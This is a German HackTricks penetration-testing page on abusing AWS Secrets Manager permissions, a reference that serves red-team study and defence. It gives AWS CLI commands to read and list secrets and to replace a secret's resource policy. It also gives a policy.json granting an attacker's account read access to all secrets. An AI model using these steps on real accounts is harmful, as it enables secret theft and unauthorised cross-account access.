AWS - Secrets Manager Privesc

Reading time: 2 minutes

tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks

Secrets Manager

Für weitere Informationen über den Secrets Manager siehe:

AWS - Secrets Manager Enum

secretsmanager:GetSecretValue

Ein Angreifer mit dieser Berechtigung kann den gespeicherten Wert innerhalb eines Secrets in AWS Secretsmanager abrufen.

bash
aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

Potenzielle Auswirkungen: Zugriff auf hochsensible Daten im AWS Secrets Manager-Dienst.

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

Mit den vorherigen Berechtigungen ist es möglich, anderen Principals/Konten (sogar externen) Zugriff auf das Geheimnis zu gewähren. Beachten Sie, dass der Benutzer auch Zugriff auf den KMS-Schlüssel haben muss, um verschlüsselte Geheimnisse mit einem KMS-Schlüssel zu lesen (weitere Informationen auf der KMS Enum-Seite).

bash
aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<attackers_account>:root"
},
"Action": "secretsmanager:GetSecretValue",
"Resource": "*"
}
]
}

tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks